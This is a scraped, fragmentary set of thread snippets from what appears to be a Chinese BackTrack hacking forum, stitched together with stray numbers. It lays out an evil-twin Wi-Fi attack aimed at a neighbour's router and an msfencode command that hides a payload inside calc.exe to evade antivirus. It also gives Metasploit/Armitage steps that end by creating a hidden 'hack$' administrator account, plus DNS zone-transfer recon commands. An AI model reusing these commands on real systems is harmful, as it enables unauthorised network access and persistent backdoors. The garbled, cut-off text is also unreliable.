-
-
15
-
85你们说个版本,我去给你们拿种子别的系统也有说个名字就好,吧主记得加精置顶
-
23群号码:255258953请各位吧友们进群之后修改一下群备注为所在地-名字的格式,方便找到同城的爱好者。谢谢合作。
-
16
-
108现在破解Wlan密码的方式貌似就aircrack-ng和reaver两种常规方式,但是,如果我们碰到一个路由器,不支持pin,密码跑了20G字典都没出该怎么办?也许很多人会放弃,但是我碰到了这种情况,我在学校附近租房子有个信号最强的,密码也很强,跑了30G字典都没出。于是就到处找思路,就有了这篇文章。 简要介绍一下攻击方法:在目标AP有客户端连接时,我们持续攻击对方的AP,使其一直连不上去,这时,我们伪造一个和目标AP SSID一样的开放的AP,普通人发
-
58
-
2711
-
59
-
3author:MartinBishop edit:Samael from:Backtrack Forums use this command: msfencode -l msfencode -i /root/Desktop/daten/myfile.exe -e x86/shikata_ga_nai -x /root/Desktop/daten/calc.exe -k -o /root/Desktop/daten/myNEWfile.exe when i got it right then is -i my file which i want to encode, -e which encoder i wanna use, -x describes what other process will be spawned and -o is just the output file.
-
5
-
10sudo gedit /etc/ppp/options 将 lcp-echo-interval 设置为0注销root41.nmap -sS -sV 192.168.1.1 2.msfconsole => load xmlrpc => armitage => select and use exploit 3.sessions => sessions -i 1 4.ps => kill xxx.exe => shell => net user hack$ hack /add => net net localgroup administrators hack$ /add2051【BackTrack】whois 域名/ip 查看域名的详细信息。 ping 域名/ip 测试本机到远端主机是否联通。 dig 域名/ip 查看域名解析的详细信息。 host -l 域名 dns服务器 传输zone。 查询信息的网站: http://centralops.net http://www.dnsstuff.com http://serversniff.net http://news.netcraft.com5http://u.115.com/file/clsvivxt# 第一部分 幕后的故事 第一章 安全软肋 第二部分 攻击者的手段 第二章 无害信息的价值 第三章 正面攻击—直接索取 第四章 建立信任 第五章 我来帮你 第六章 你能帮我吗? 第七章 假冒网站和危险附件 第八章 利用同情、内疚和胁迫 第九章 逆向骗局 第三部分 入侵警报 第十章进入内部 第十一章 综合技术与社会工程学 第十二章 攻击新进员工 第十三章 聪明的骗局 第十四章 商业间谍 第四部分 加强防392http://video.linux520.com/v3/123/ 载入armitage时可以在MSF中用load xmlrpc指令33截至发帖之日,最新的 版本是Backtrack5 R112terminal:apt-get install language-pack-gnome-zh language-pack-gnome-zh-base language-pack-zh language-pack-zh-base language-selector